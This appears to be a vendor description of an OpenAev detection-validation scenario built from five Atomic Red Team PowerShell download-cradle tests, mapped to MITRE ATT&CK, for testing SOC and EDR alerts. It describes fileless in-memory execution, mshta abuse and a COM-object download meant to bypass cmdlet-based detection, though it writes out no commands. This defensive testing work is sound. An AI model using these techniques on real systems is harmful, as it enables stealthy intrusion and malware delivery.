Suspicious PowerShell Download Cradle Activity

🧪 Injects Included in This Scenario

The scenario is composed of five Atomic Red Team payloads, each representing a distinct but related download-and-execute pattern:

1️⃣ Run BloodHound from Memory using Download Cradle (PowerShell) 🧠 Executes BloodHound directly in memory using a PowerShell download cradle (IEX + DownloadString), without touching disk.

2️⃣ Invoke mshta.exe Download (PowerShell) 📥 Uses PowerShell to invoke mshta.exe for remote script execution, a well-known Living-off-the-Land technique.

3️⃣ PowerShell XML Requests 🌐 Leverages PowerShell web/XML request capabilities to retrieve remote content over HTTP/S.

4️⃣ PowerShell MsXml COM Object – With Prompt 🧩 Abuses the MSXML2.XMLHTTP COM object to download external payloads, bypassing common PowerShell cmdlet-based detections.

5️⃣ PowerShell Fileless Script Execution ⚡ Executes remote PowerShell code entirely in memory, leaving minimal forensic artifacts on disk.

🧠 MITRE ATT&CK Mapping

Primary Technique: T1059.001 – Command and Scripting Interpreter: PowerShell

Supporting Techniques:

• T1105 – Ingress Tool Transfer-
• T1027 – Obfuscated Files or Information-
• T1071.001 – Web Protocols

🛡️ How OpenAev Validates Detection 🧪

OpenAev enables defenders to validate and strengthen detection logic against these attack patterns by:

✅ Simulating realistic attacker tradecraft using Atomic Red Team payloads ✅ Triggering PowerShell telemetry (ScriptBlock, command line, AMSI, process lineage) ✅ Correlating behaviors across execution, network, and process activity ✅ Identifying detection gaps around fileless and LOLBins-based techniques ✅ Providing repeatable, safe validation of SOC and EDR detection rules

💡 This allows security teams to confirm that alerts trigger where expected, and to tune detections for high-risk PowerShell download cradle activity without relying on real malware.